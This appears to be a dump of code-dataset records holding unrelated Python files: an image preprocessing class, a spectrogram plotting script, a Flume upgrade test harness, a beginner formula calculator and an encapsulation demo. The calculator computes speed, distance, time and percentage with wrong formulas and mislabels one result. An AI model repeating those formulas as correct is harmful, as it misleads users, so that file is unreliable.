(ARG_EXPR_F, ARG_STMT_F, ARG_TIMEIT_ON_F)),\n ],\n}\n","sub_path":"src/aoikfuncit/argpsr_const.py","file_name":"argpsr_const.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496963985","text":"from collections import Counter, namedtuple\nfrom io import BytesIO\nfrom itertools import chain\nimport logging\nimport os\nimport json\nimport pickle\n\nfrom IPython.display import display\nimport numpy as np\nfrom PIL import Image\nimport requests\nimport torch\n\nPreprocessedData = namedtuple('PreprocessedData',\n ('object_squares',\n 'img_ids',\n 'original_sizes',\n 'object_names',\n 'attributes_names')\n )\n\nclass WrongModeException(Exception):\n pass\n\nclass BBExtractor(object):\n def __init__(self, data_path='/home/ubuntu/data',\n preprocessing_path='/home/ubuntu/preprocessing',\n max_num_objects=100,\n max_num_attributes=100,\n use_sparse_matrices=True):\n self.data_path = data_path\n self.preprocessing_path = preprocessing_path\n self.image_data_path = os.path.join(data_path, 'image_data.json')\n self.objects_path = os.path.join(data_path, 'objects.json')\n self.attributes_path = os.path.join(data_path, 'attributes.json')\n self.img_dir = os.path.join(data_path, 'VG_100K_all')\n self.max_num_objects = max_num_objects\n self.max_num_attributes = max_num_attributes\n self.objects_info = 
self._objects_info()\n self.attributes_info = self._attributes_info()\n self.vocabulary = self._vocabulary()\n self.use_sparse_matrices = use_sparse_matrices\n \n def _objects_info(self):\n logger = logging.getLogger(__name__)\n with open(self.objects_path, 'r') as objects_file:\n objects_info_list = json.loads(objects_file.read())\n objects_info = {obj['image_id']: obj\n for obj in objects_info_list}\n logger.info('Loaded objects info.')\n return objects_info\n \n def _attributes_info(self):\n logger = logging.getLogger(__name__)\n with open(self.attributes_path, 'r') as attributes_file:\n attributes_info_list = json.loads(attributes_file.read())\n attributes_info = {attr['image_id']: attr \n for attr in attributes_info_list}\n logger.info('Loaded attributes info.')\n return attributes_info\n \n def _vocabulary(self):\n logger = logging.getLogger(__name__)\n\n vocabulary_path = os.path.join(self.preprocessing_path, 'vocabulary.pkl')\n if os.path.exists(vocabulary_path):\n with open(vocabulary_path, 'rb') as vocabulary_file:\n vocabulary = pickle.load(vocabulary_file)\n logger.info('Loaded vocabulary.')\n else:\n objects_counter = Counter()\n for objects_info_image in self.objects_info.values():\n for object_ in objects_info_image['objects']:\n for name in object_['names']:\n objects_counter[name] += 1\n sorted_obj_items = sorted(objects_counter.items(), key=lambda u: (-u[1], u[0]))\n vocabulary_objects = [item[0] for item in sorted_obj_items]\n obj_to_ix = {name: ix for ix, name in enumerate(vocabulary_objects)}\n\n attributes_counter = Counter()\n vocabulary_attributes = set()\n for attributes_info_image in self.attributes_info.values():\n for attributes_info_object in attributes_info_image['attributes']:\n for attribute in attributes_info_object.get('attributes', []):\n attributes_counter[attribute] += 1\n sorted_attr_items = sorted(attributes_counter.items(), key=lambda u: (-u[1], u[0]))\n vocabulary_attributes = [item[0] for item in sorted_attr_items]\n att_to_ix = {name: ix for ix, name in enumerate(vocabulary_attributes)}\n \n vocabulary = {\n 'vocabulary_objects': vocabulary_objects,\n 'obj_to_ix': obj_to_ix,\n 'vocabulary_attributes': vocabulary_attributes,\n 'att_to_ix': att_to_ix\n }\n with open(vocabulary_path, 'wb') as vocabulary_file:\n pickle.dump(vocabulary, vocabulary_file)\n logger.info('Generated vocabulary.')\n return vocabulary\n \n def get_img(self, img_id, url):\n img_name = '{}.jpg'.format(img_id)\n image_path = os.path.join(self.img_dir, img_name)\n if os.path.isfile(image_path):\n return Image.open(image_path)\n if url is not None:\n url_split = url.split('/')\n r = requests.get(url)\n r.raise_for_status()\n image_path = os.path.join(dir_path, url_split[-2], img_name)\n with open(image_path, 'wb') as image_file:\n image_file.write(r.content)\n return Image.open(BytesIO(r.content))\n raise requests.exceptions.HTTPError\n \n def label_vector(self, an, m):\n size = torch.Size((len(an), m))\n if self.use_sparse_matrices:\n indices_list = [[i, v]\n for i, attr_row in enumerate(an)\n for v in attr_row\n if v < m]\n k = len(indices_list)\n if k > 0:\n indices = torch.LongTensor(list(zip(*indices_list)))\n values = torch.ones(k).byte()\n return torch.sparse.ByteTensor(indices,\n values,\n size)\n return torch.sparse.ByteTensor(size)\n else:\n R = torch.zeros(size).byte()\n for i, attr_row in enumerate(an):\n for v in attr_row:\n if v < m:\n R[i, v] = 1\n return R\n \n def preprocess_image(self, image_id, display_images=False): \n objects_info_image = 
self.objects_info[image_id]\n attributes_info_image = self.attributes_info[image_id]\n img = self.get_img(img_id=objects_info_image['image_id'],\n url=objects_info_image.get('image_url', None))\n\n if img.mode != 'RGB':\n raise WrongModeException\n\n if display_images:\n display(img)\n print('Original image\\n')\n\n objects = objects_info_image['objects']\n N = len(objects)\n\n attributes = attributes_info_image['attributes']\n attributes_dict = {object_['object_id']:\n object_.get('attributes', [])\n for object_ in attributes}\n\n img_ids = np.ones(N, dtype=np.int) * image_id\n objects_squares = np.empty((N, 3, 224, 224), dtype=np.uint8)\n original_sizes = np.empty(N, dtype=np.int)\n objects_names = []\n attributes_names = []\n \n att_to_ix = self.vocabulary['att_to_ix']\n obj_to_ix = self.vocabulary['obj_to_ix']\n\n for i, (object_, attrs) in enumerate(zip(objects, attributes)):\n attrs = attributes_dict[object_['object_id']]\n attributes_names.append([att_to_ix[attr] for attr in attrs])\n original_sizes[i] = object_['w'] * object_['h']\n objs = object_['names']\n objects_names.append([obj_to_ix[obj] for obj in objs])\n\n # Image processing\n cropped = img.crop((object_['x'],\n object_['y'],\n object_['x'] + object_['w'],\n object_['y'] + object_['h']))\n resized = cropped.resize((224, 224))\n\n if display_images:\n display(resized)\n print(' - '.join(object_['names']))\n print()\n\n objects_squares[i] = np.rollaxis(np.asarray(resized), axis=2, start=0)\n\n return PreprocessedData(objects_squares, img_ids, original_sizes, objects_names, attributes_names)\n \n def preprocess_images(self, image_ids):\n assert len(image_ids) >= 1\n logger = logging.getLogger(__name__)\n failed = []\n wrong_mode = []\n\n lists_per_image = []\n \n for _ in PreprocessedData._fields:\n lists_per_image.append([])\n\n for image_id in image_ids:\n try:\n result = self.preprocess_image(image_id)\n except requests.exceptions.HTTPError:\n failed.append(str(image_id))\n continue\n except WrongModeException:\n wrong_mode.append(str(image_id))\n continue\n except Exception as e:\n logger.error('Error with image {}.'.format(image_id))\n raise e\n\n for i, r in enumerate(result):\n lists_per_image[i].append(r)\n\n if failed:\n logger.warning('Failed to load image(s) {}.'.format(', '.join(failed)))\n\n if wrong_mode:\n logger.warning('Wrong mode for image(s) {}.'.format(', '.join(wrong_mode)))\n \n for i in range(0, 3):\n lists_per_image[i] = np.concatenate(lists_per_image[i])\n \n properties_objatt = ((3, self.max_num_attributes),\n (4, self.max_num_objects))\n for i, max_num in properties_objatt:\n an = sum(lists_per_image[i], [])\n lists_per_image[i] = self.label_vector(an, max_num)\n \n return PreprocessedData(*lists_per_image)\n \n @property\n def VG_ids_with_COCO(self):\n if not hasattr(self, '_VG_ids_with_COCO'):\n image_data_path = os.path.join(self.data_path, 'image_data.json')\n with open(image_data_path, 'r') as D: #json file containing visual genome image information.\n F = json.loads(D.read()) # creates a list\n VG_ids = [] # list of common visual genome ids\n\n for f in F:\n if f['coco_id'] is not None:\n VG_ids.append(f['image_id'])\n self._VG_ids_with_COCO = sorted(VG_ids)\n return self._VG_ids_with_COCO","sub_path":"Att_net/bounding_box_extractor.py","file_name":"bounding_box_extractor.py","file_ext":"py","file_size_in_byte":10156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621016250","text":"#!/usr/bin/env python3\n\n\nimport argparse\nimport 
scipy as s\nimport scipy.fftpack as fft\nimport matplotlib.pyplot as plot\nimport wells.publisher as publisher\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--t\",\n type=float,\n help=\"Time at which diagram should be plotted\")\nparser.add_argument(\"--width\",\n type=float,\n default=1.0,\n help=\"Window width\")\nparser.add_argument(\"--ext\",\n help=\"output file extension\",\n type=str,\n default=\"png\")\nparser.add_argument(\"input\",\n type=str,\n help=\"Path to the input file\")\nargs = parser.parse_args()\n\n\nworkspace = s.load(args.input)\nt = workspace[\"t\"]\nx = workspace[\"x\"]\nk = workspace[\"k\"]\nstates = workspace[\"states\"]\nbackground = workspace[\"background\"]\n\n\nidx = abs(t - args.t).argmin()\nt = t[idx]\nstate = states[idx, :]\n\n\ndef xfrog(x0, state, delay, width):\n window = lambda x: s.exp(-(x/width)**2)\n diagram = s.zeros((len(x), len(delay)), dtype=complex)\n for idx in range(len(delay)):\n diagram[:, idx] = window(x - delay[idx]) * state\n diagram = fft.fft(diagram, axis=0)\n diagram = fft.fftshift(diagram, axes=[0])\n return diagram\n\n\ndelay = s.linspace(-64, +64, 2**11)\nimage = xfrog(t, state, delay, args.width)\nimage = abs(image)\nimage = image / image.max()\nimage = 20 * s.log10(image)\n\npublisher.init({\"figure.figsize\": (2.8, 2.4)})\nprefix = args.input.replace(\".npz\", \"\")\nfilename = prefix + \"_xfrog=%.2f\" % args.t\n\nplot.figure()\naxs = plot.subplot(1, 1, 1)\nplot.title(r\"$t=%.2f$\" % args.t, y=1.05)\nplot.pcolormesh(\n delay, k, image,\n cmap=\"magma\",\n rasterized=True)\nplot.xlim(-20, +20)\nplot.xticks(s.arange(-40, +41, 20))\nplot.ylim(-40, +40)\nplot.yticks(s.arange(-40, +41, 20))\nplot.clim(-80, 0)\nplot.colorbar().set_ticks(s.arange(-80, 1, 20))\nplot.xlabel(r\"$z$\")\nplot.ylabel(r\"$k_z$\")\naxs.tick_params(direction=\"out\")\n\npublisher.publish(filename, args.ext)\nplot.close()\n\nprint(filename + \".\" + args.ext)\n","sub_path":"publish_xfrog.py","file_name":"publish_xfrog.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"340350661","text":"#\n# Copyright (c) 2011-2016, Hortonworks Inc. 
All rights reserved.\n#\n# Except as expressly permitted in a written agreement between your\n# company and Hortonworks, Inc, any use, reproduction, modification,\n# redistribution, sharing, lending or other exploitation of all or\n# any part of the contents of this file is strictly prohibited.\n#\n#\nimport os, re, string, time, socket, logging, platform, urllib2, collections, datetime, json\nimport urllib, sys, shutil\nfrom beaver.component.hadoop import Hadoop, HDFS, MAPRED, YARN\nfrom beaver.component import HadoopJobHelper\nfrom beaver.machine import Machine\nfrom beaver.config import Config\nfrom beaver import util\nfrom beaver import configUtils\n\nlogger = logging.getLogger(__name__)\n\n\nclass ruFlume:\n _agent1 = None\n _agent2 = None\n _local_work_dir = os.path.join(Config.getEnv('ARTIFACTS_DIR'), 'flume')\n _data_file = os.path.join(_local_work_dir, 'data.out')\n _data_stop = os.path.join(_local_work_dir, \"data.stop\")\n _flume_test_conf = os.path.join(Config.getEnv('WORKSPACE'), 'tests', 'rolling_upgrade', 'flumeconf')\n _flume_datagen_src = os.path.join(_flume_test_conf, 'print_stream.py')\n _flume_test_src = os.path.join(_local_work_dir, 'longrunning.properties')\n _hdfs_test_dir = \"/tmp/flumelr\"\n _test_user = Config.getEnv('USER')\n _hdfs_user = Config.get('hadoop', 'HDFS_USER')\n _agent1_chkpt_dir = os.path.join(_local_work_dir, 'checkpoint1')\n _agent2_chkpt_dir = os.path.join(_local_work_dir, 'checkpoint2')\n _agent1_data_dir = os.path.join(_local_work_dir, 'datadir1')\n _agent2_data_dir = os.path.join(_local_work_dir, 'datadir2')\n\n @classmethod\n def background_job_setup(cls, runSmokeTestSetup=True, config=None):\n '''\n Setup for background long running job\n :param runSmokeTestSetup: Runs smoke test setup if set to true\n '''\n from beaver.component.rollingupgrade.ruUpgrade import UpgradePerNode\n UpgradePerNode.reportProgress(\"[INFO][FLUME][BGJobSetup] Long running job setup for Flume component started\")\n from beaver.component.flume import Agent\n global agent1\n global agent2\n if not os.path.exists(cls._local_work_dir):\n os.mkdir(cls._local_work_dir)\n shutil.copy(cls._flume_datagen_src, cls._local_work_dir)\n agent1 = Agent(cls._local_work_dir)\n agent2 = Agent(cls._local_work_dir)\n for outdir in (cls._agent1_chkpt_dir, cls._agent1_data_dir, cls._agent2_chkpt_dir, cls._agent2_data_dir):\n os.mkdir(outdir)\n logger.info(\"Preparing the Flume configs for long running test\")\n propertyMap = {}\n namenode = Hadoop.getFSDefaultValue()\n propertyMap['agent2.sinks.hdfsSink.hdfs.path'] = \"%s%s\" % (namenode, cls._hdfs_test_dir)\n if Hadoop.isSecure():\n if Config.hasOption('machine', 'USER_REALM'):\n user_realm = Config.get('machine', 'USER_REALM', '')\n else:\n nnKerbPrincipal = HDFS.getNameNodePrincipal(defaultValue='')\n atloc = nnKerbPrincipal.find(\"@\")\n if atloc != -1:\n user_realm = nnKerbPrincipal[atloc:]\n if user_realm:\n propertyMap['agent2.sinks.hdfsSink.hdfs.kerberosPrincipal'] = cls._test_user + '@' + user_realm\n propertyMap['agent2.sinks.hdfsSink.hdfs.kerberosKeytab'] = Machine.getHeadlessUserKeytab(cls._test_user)\n util.writePropertiesToFile(\n os.path.join(cls._flume_test_conf, 'longrunning.properties'), cls._flume_test_src, propertyMap\n )\n\n @classmethod\n def smoke_test_setup(cls):\n '''\n Setup required to run Smoke test\n '''\n logger.info(\"TODO\")\n\n @classmethod\n def run_background_job(cls, runSmokeTestSetup=True, config=None):\n '''\n Runs background long running Flume Job\n :param runSmokeTestSetup: Runs smoke test setup if 
set to true\n :param config: expected configuration location\n :return: Total number of long running jobs started\n '''\n from beaver.component.rollingupgrade.ruUpgrade import UpgradePerNode\n HDFS.createDirectory(cls._hdfs_test_dir, perm=\"777\", force=True)\n UpgradePerNode.reportProgress(\"[INFO][FLUME][BGJob] Long running job for Flume component started\")\n logger.info(\"Starting the Flume Agent Topology\")\n addlParams = \"-Dflume.log.dir=%s -Dflume.log.file=agent2.log\" % cls._local_work_dir\n agent2.start(\"agent2\", cls._flume_test_src, addlParams=addlParams, enableDebugLogOnConsole=False)\n logger.info(\"Sleeping for 10 seconds before starting the other Flume agent\")\n time.sleep(10)\n addlParams = \"-Dflume.log.dir=%s -Dflume.log.file=agent.log\" % cls._local_work_dir\n agent1.start(\"agent\", cls._flume_test_src, addlParams=addlParams, enableDebugLogOnConsole=False)\n time.sleep(5)\n return 1\n\n @classmethod\n def run_smoke_test(cls, smoketestnumber, config=None):\n '''\n Run smoke test for yarn\n :param smoketestnumber: Used for unique output log location\n '''\n logger.info(\"TODO\")\n\n @classmethod\n def background_job_teardown(cls):\n '''\n Cleanup for long running Yarn job\n '''\n from beaver.component.rollingupgrade.ruUpgrade import UpgradePerNode\n UpgradePerNode.reportProgress(\n \"[INFO][FLUME][BGJobTeardown] teardown for Long running job of Flume component started\"\n )\n if agent1.isalive():\n logger.info(\"Terminating the first Flume agent\")\n agent1.stop()\n if agent2.isalive():\n logger.info(\"Terminating the second Flume agent\")\n agent2.stop()\n for outdir in (cls._agent1_chkpt_dir, cls._agent1_data_dir, cls._agent2_chkpt_dir, cls._agent2_data_dir):\n if os.path.exists(outdir):\n shutil.rmtree(outdir)\n if os.path.isfile(cls._data_file):\n os.remove(cls._data_file)\n if os.path.isfile(cls._data_stop):\n os.remove(cls._data_stop)\n\n @classmethod\n def verifyLongRunningJob(cls):\n '''\n Validate long running background job after end of all component upgrade\n '''\n from beaver.component.rollingupgrade.ruUpgrade import UpgradePerNode\n logger.info(\"Stop the Flume agents before verification\")\n open(cls._data_stop, 'a').close()\n time.sleep(60)\n agent1.stop()\n agent2.stop()\n time.sleep(60)\n logger.info(\"Verifying the sinked data from Flume agent\")\n exit_code, stdout, stderr = Hadoop.runas(\n cls._hdfs_user, \"dfs -cat %s/*\" % cls._hdfs_test_dir, logoutput=False, stderr_as_stdout=False\n )\n if exit_code != 0:\n logger.error(\"Following error during the HDFS cat while fetching Flume data: %s\" % stderr)\n if not util.compareOutputToFileIgnoreDupsAndOrder(stdout, cls._data_file):\n UpgradePerNode.reportProgress(\n \"[FAILED][FLUME][BGJob] Long running test for Flume failed while verifying data\"\n )\n else:\n UpgradePerNode.reportProgress(\n \"### [PASSED][FLUME][BGJob] Long running test validation for Flume passed ####\"\n )\n\n @classmethod\n def upgrade_master(cls, version, config=None):\n '''\n Upgrades Master services:\n :param version: Version to be upgraded to\n :param config: Config location\n '''\n cls.switch_master_version(version)\n\n @classmethod\n def switch_master_version(cls, version):\n '''\n Switches the Flume agent service\n :param version: Version to be switched to\n '''\n from beaver.component.rollingupgrade.ruCommon import hdpSelect\n logger.info(\"Stop the second Flume Agent before upgrade\")\n open(cls._data_stop, 'a').close()\n time.sleep(10)\n agent1.stop()\n time.sleep(3)\n os.remove(cls._data_stop)\n 
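# The hdp-select pointer is flipped while agent1 is stopped, then the agents\n        # are restarted one at a time so the topology keeps moving events during\n        # the rolling version switch.\n        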
hdpSelect.changeVersion(\"flume-server\", version)\n logger.info(\"Restart the Flume agents with the new version\")\n addlParams = \"-Dflume.log.dir=%s -Dflume.log.file=agent.log\" % cls._local_work_dir\n agent1.start(\"agent\", cls._flume_test_src, addlParams=addlParams, enableDebugLogOnConsole=False)\n time.sleep(20)\n agent2.stop()\n time.sleep(10)\n addlParams = \"-Dflume.log.dir=%s -Dflume.log.file=agent2.log\" % cls._local_work_dir\n agent2.start(\"agent2\", cls._flume_test_src, addlParams=addlParams, enableDebugLogOnConsole=False)\n time.sleep(10)\n\n @classmethod\n def upgrade_slave(cls, version, node, config=None):\n '''\n Upgrades slave services :\n :param version: Version to be upgraded to\n :param node: Slave Node\n :param config: Config location\n :return:\n '''\n logger.info(\"*** No slave component in Flume, so nothing to upgrade ***\")\n\n @classmethod\n def downgrade_master(cls, version, config=None):\n '''\n Downgrade Master services\n :param version: Version to be downgraded to\n :param config: Configuration location\n '''\n cls.switch_master_version(version)\n\n @classmethod\n def downgrade_slave(cls, version, node, config=None):\n '''\n Downgrade slave services\n :param version: version to be downgraded to\n :param config: Configuration location\n '''\n logger.info(\"*** No slave component in Flume, so nothing to downgrade ***\")\n\n @classmethod\n def run_client_smoketest(cls, config=None, env=None):\n '''\n Run Smoke test after upgrading Client\n :param config: Configuration location\n :param env: Set Environment variables\n '''\n logger.info(\"TODO\")\n\n @classmethod\n def testAfterAllSlavesRestarted(cls):\n '''\n Function to test upgrade is done properly after all master and slaves are upgraded for Hdfs, yarn and Hbase\n :return:\n '''\n logger.info(\"Nothing to be done here for Flume\")\n","sub_path":"beaver/component/rollingupgrade/ruFlume.py","file_name":"ruFlume.py","file_ext":"py","file_size_in_byte":10090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"364429453","text":"''' Formula's Calculations using Functions '''\r\n\r\nprint(\"\\n\\t Formula's Calculations - Select Yours Operation\")\r\n\r\nprint(\"\\n\\t Press & Enter (A) - Average\")\r\n\r\nprint(\"\\n\\t Press & Enter (P) - Percentage\")\r\n\r\nprint(\"\\n\\t Press & Enter (MM) - Maximum & Minimum\")\r\n\r\nprint(\"\\n\\t Press & Enter (EO) - Even or Odd Number\")\r\n\r\nprint(\"\\n\\t Press & Enter (PC) - Prime or Consonant Number\")\r\n\r\nprint(\"\\n\\t Press & Enter (PN) - Positive or Negative\")\r\n\r\nprint(\"\\n\\tPress & Enter (SCFF) - Square, Cube, Fourth & Fivthpower\")\r\n\r\nprint(\"\\n\\t Press & Enter (ATCS) - Area of Triangle, Cricle & Sphere\")\r\n\r\nprint(\"\\n\\t Press & Enter (SDT) - Speed, Distance & Time\")\r\n\r\nprint(\"\\n\\n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\")\r\n\r\nwhile True:\r\n\r\n formulas = input(\"\\nFrom Above Statements - Provide a Number to Perform Calculation \\n\\nPress - ( A - P - MM - EO - PC - PN - SCFF - ATCS - SDT ) : \")\r\n\r\n formulas = formulas.upper()\r\n\r\n if formulas in ('A','P','MM','EO','PC','PN','SCFF','ATCS','SDT'):\r\n\r\n if formulas == 'A':\r\n\r\n ''' Average '''\r\n\r\n num = int(input(\"\\nProvide Number of Value's you want Calculate:\"))\r\n\r\n def avg():\r\n\r\n sum = 0\r\n\r\n for i in range(num):\r\n\r\n number = int(input(\"\\nDecide a Number : \"))\r\n\r\n sum = sum + number\r\n\r\n average = sum / num\r\n\r\n print(\"\\n\\tThe Average of 
Numbers will be\", round(average,2))\r\n\r\n avg()\r\n\r\n elif formulas == 'P':\r\n\r\n ''' Percentage '''\r\n\r\n num = int(input(\"\\nProvide Number of Value's you want Calculate:\"))\r\n\r\n def per():\r\n\r\n sum = 0\r\n\r\n for i in range(num):\r\n\r\n number = eval(input(\"\\nDecide a Number : \"))\r\n\r\n sum = sum + number\r\n\r\n percentage = sum / 100\r\n\r\n print(\"\\n\\tThe Percentage of Numbers will be\", round(percentage,2))\r\n\r\n per()\r\n\r\n elif formulas == 'MM':\r\n\r\n ''' Maximum & Minimum '''\r\n\r\n my_list = []\r\n\r\n num = int(input(\"\\nProvide Number of Value's you want Calculate:\"))\r\n\r\n def display():\r\n\r\n for i in range(num):\r\n\r\n numbers = int(input(\"\\nDecide a Number : \"))\r\n\r\n my_list.append(numbers)\r\n\r\n print(\"\\n\\tMaximum element in the list is :\", max(my_list), \"\\n\\n\\tMinimum element in the list is :\", min(my_list))\r\n\r\n display()\r\n\r\n elif formulas == 'EO':\r\n\r\n ''' Even or Odd '''\r\n\r\n num = int(input(\"\\nDecide a Number : \"))\r\n\r\n def display(num):\r\n\r\n if (num % 2 == 0):\r\n\r\n print(\"\\n\\t\",num, \"Is Even Number\")\r\n\r\n else:\r\n print(\"\\n\\t\",num, \"Is Odd Number\")\r\n\r\n display(num)\r\n\r\n elif formulas == 'PC':\r\n\r\n ''' Prime & Consonant Numbers '''\r\n\r\n def prime(num):\r\n\r\n if num > 1:\r\n\r\n for i in range(2, num):\r\n\r\n if (num % i) == 0:\r\n\r\n print(num, \"is not a Prime Number - Consonant Number\")\r\n\r\n break\r\n\r\n else:\r\n\r\n print(num, \"is a Prime Number - Not a Consonant Number\")\r\n else:\r\n\r\n print(num, \"is not a Prime Number - Consonant Number\")\r\n\r\n return \"\"\r\n\r\n number = int(input(\"\\n\\tProvide a Number to Check : \"))\r\n\r\n print()\r\n\r\n print(prime(number))\r\n\r\n elif formulas == 'PN':\r\n\r\n ''' Positive or Negative '''\r\n\r\n num = eval(input(\"\\nDecide a Number : \"))\r\n\r\n def integer():\r\n\r\n if num > 0:\r\n\r\n print(\"\\n\\t\",num, \"Is Positive Integer\")\r\n\r\n elif num == 0:\r\n\r\n print(\" Integer Is Neither Positive & Nor Negative - (ZERO)\")\r\n\r\n else:\r\n print(\"\\n\\t\",num, \"Is Negative Integer\")\r\n\r\n integer()\r\n\r\n elif formulas == 'SCFF':\r\n\r\n ''' Square, Cube, Fourthpower and Fifthpower '''\r\n\r\n def square(num):\r\n\r\n print(\"\\n\\tThe Square of Number will be \",num * num)\r\n\r\n return \"\"\r\n\r\n def cube(num):\r\n\r\n print(\"\\n\\tThe Cube of Number will be \",num * num * num)\r\n\r\n return \"\"\r\n\r\n def fourthpower(num):\r\n\r\n print(\"\\n\\tThe Fourth Power of Number will be \",num * num * num * num)\r\n\r\n return \"\"\r\n\r\n def fifthpower(num):\r\n\r\n print(\"\\n\\tThe Fifth Power of Number will be \",num * num * num * num * num)\r\n\r\n return \"\"\r\n\r\n ''' Function Calling / Execution - For Square, Cube, 4th & 5th Power '''\r\n\r\n print(\"\\n\\t Select Your Root to Perform. 
\\n\")\r\n\r\n print(\"\\n\\t Press S - For Square \\n\")\r\n\r\n print(\"\\n\\t Press C - For Cube \\n\")\r\n\r\n print(\"\\n\\t Press FOU - For Fourth Power \\n\")\r\n\r\n print(\"\\n\\t Press FIF - For Fifth Power \\n\\n\")\r\n\r\n while True:\r\n\r\n ''' Take input from the user '''\r\n\r\n formulas = input(\"Enter Your choice For Root - Press - ( S - C - FOU - FIF) : \")\r\n\r\n formulas = formulas.upper()\r\n\r\n ''' Check if choice is one of the four options '''\r\n\r\n if formulas in ('S', 'C', 'FOU', 'FIF'):\r\n\r\n num = int(input(\"\\nDecide a number for the selected root: \"))\r\n\r\n\r\n if formulas == 'S':\r\n\r\n print(square(num))\r\n\r\n elif formulas == 'C':\r\n\r\n print(cube(num))\r\n\r\n elif formulas == 'FOU':\r\n\r\n print(fourthpower(num))\r\n\r\n elif formulas == 'FIF':\r\n\r\n print(fifthpower(num))\r\n\r\n break\r\n\r\n else:\r\n print(\"Invalid Input\")\r\n\r\n elif formulas == 'ATCS':\r\n\r\n ''' Area of Triangle, Circle & Sphere '''\r\n\r\n def areaoftriangle():\r\n\r\n height = h = int(input(\"\\nDecide the Height of Triangle : \"))\r\n\r\n base = b = int(input(\"\\nDecide the Base of Triangle : \"))\r\n\r\n areaoftriangle = (height * base) / 2\r\n\r\n print(\"\\n\\tArea of Triangle = \", round(areaoftriangle, 2))\r\n\r\n return \"\"\r\n\r\n def areaofcircle():\r\n\r\n pi = 3.14\r\n\r\n radius = r = int(input(\"\\nDecide the Radius : \"))\r\n\r\n areaofcircle = pi * ( radius ** 2 )\r\n\r\n print(\"\\n\\tArea of Triangle = \", round(areaofcircle, 2))\r\n\r\n return \"\"\r\n\r\n def areaofsphere():\r\n\r\n pi = 3.14\r\n\r\n radius = r = int(input(\"\\nDecide the Radius : \"))\r\n\r\n areaofsphere = 4 * pi * (r ** 2)\r\n\r\n print(\"\\n\\tArea of Sphere = \", round(areaofsphere,2))\r\n\r\n return \"\"\r\n\r\n print(\"\\n\\t Select Your Choice to Calculate Area of Triangle, Circle or Sphere \\n\")\r\n\r\n print(\"\\n\\t Press & Enter (AT) - Area of Triangle \\n\")\r\n\r\n print(\"\\n\\t Press & Enter (AC) - Area of Circle \\n\")\r\n\r\n print(\"\\n\\t Press & Enter (AS) - Area of Sphere \\n\")\r\n\r\n while True:\r\n\r\n ''' Take input from the user '''\r\n\r\n formulas = input(\"Enter Your choice For Calculation - Press - ( AT - AC - AS ) : \")\r\n\r\n formulas = formulas.upper()\r\n\r\n ''' Check if choice to Calculate Speed, Time or Distance '''\r\n\r\n if formulas in ('AT', 'AC', 'AS'):\r\n\r\n if formulas == 'AT':\r\n\r\n print(areaoftriangle())\r\n\r\n elif formulas == 'AC':\r\n\r\n print(areaofcircle())\r\n\r\n elif formulas == 'AS':\r\n\r\n print(areaofsphere())\r\n\r\n break\r\n\r\n else:\r\n\r\n print(\"Invalid Input\")\r\n\r\n elif formulas == 'SDT':\r\n\r\n ''' Speed, Distance & Time '''\r\n\r\n def speed(distance, time):\r\n\r\n distance = int(input(\"\\nDecide the Distance (KM) - To Calculate Speed : \"))\r\n\r\n time = int(input(\"\\nDecide the Time (S) - To Calculate Speed : \"))\r\n\r\n speed = distance * time\r\n\r\n return speed\r\n\r\n\r\n def distance(speed, time):\r\n\r\n speed = int(input(\"\\nDecide the Speed (M/S) - To Calculate Distance : \"))\r\n\r\n time = int(input(\"\\nDecide the Time (S) - To Calculate Distance : \"))\r\n\r\n distance = speed / time\r\n\r\n return distance\r\n\r\n def time(speed, distance):\r\n\r\n speed = int(input(\"\\nDecide the Speed (M/S) - To Calculate Time : \"))\r\n\r\n distance = int(input(\"\\nDecide the Distance (KM)- To Calculate Time : \"))\r\n\r\n time = speed / distance\r\n\r\n return time\r\n\r\n print(\"\\n\\t Select Your Choice to Calculate Speed, Time or Distance \\n\")\r\n\r\n print(\"\\n\\t 
Press S - Speed (M/S) \\n\")\r\n\r\n print(\"\\n\\t Press D - Distance (KM) \\n\")\r\n\r\n print(\"\\n\\t Press T - Time (S) \\n\")\r\n\r\n while True:\r\n\r\n ''' Take input from the user '''\r\n\r\n formulas = input(\"Enter Your choice For Calculation - Press - ( S - D - T ) : \")\r\n\r\n ''' Check if choice to Calculate Speed, Time or Distance '''\r\n\r\n formulas = formulas.upper()\r\n\r\n if formulas in ('S', 'D', 'T'):\r\n\r\n if formulas == 'S':\r\n\r\n print(\"\\n\\tSpeed - According To - Given Distance & Time : \",speed(distance, time), end=' (Meter Per Second)')\r\n\r\n elif formulas == 'D':\r\n\r\n print(\"\\n\\tDistance - According To - Given Speed & Time : \",distance(speed, time), end=' (Kilometers)')\r\n\r\n elif formulas == 'T':\r\n\r\n print(\"\\n\\tTime - According To - Given Speed & Distance : \",time(speed, distance), end=' (Second)')\r\n\r\n break\r\n\r\n else:\r\n\r\n print(\"Invalid Input\")\r\n\r\n break\r\n\r\n else:\r\n\r\n print(\"Invalid Input\")","sub_path":"src/Formulas_Calculations.py","file_name":"Formulas_Calculations.py","file_ext":"py","file_size_in_byte":10544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195442936","text":"class A:\r\n\tdef __init__(self, name, age):\r\n\t\tself.__name = name\r\n\t\tself._age = age\r\n\r\n\tdef get_name(self):\r\n\t\tprint(self.__name)\r\n\r\n\tdef get_age(self):\r\n\t\tprint(self._age)\r\n\r\n\tdef __hell(self):\r\n\t\tprint(\"Welcome vt\")\r\n\r\na1 = A(\"Moshe\", 22)\r\na1.get_name()\r\n# a1.name = \"jdklafj\"\r\na1._A__name = \"fasjfkl\"\r\na1.get_name()\r\nprint(a1._age)\r\na1._age = 76\r\nprint(a1._age)\r\n\r\nprint(a1._A__name)\r\n\r\na1._A__hell()\r\n\r\ndef greet(name = None):\r\n if name:\r\n return \"Hello {}\".format(name)\r\n return \"Hello\"\r\n \r\n \r\nprint(greet())\r\nprint(greet(\"vinay\"))","sub_path":"backup files/encap.py","file_name":"encap.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 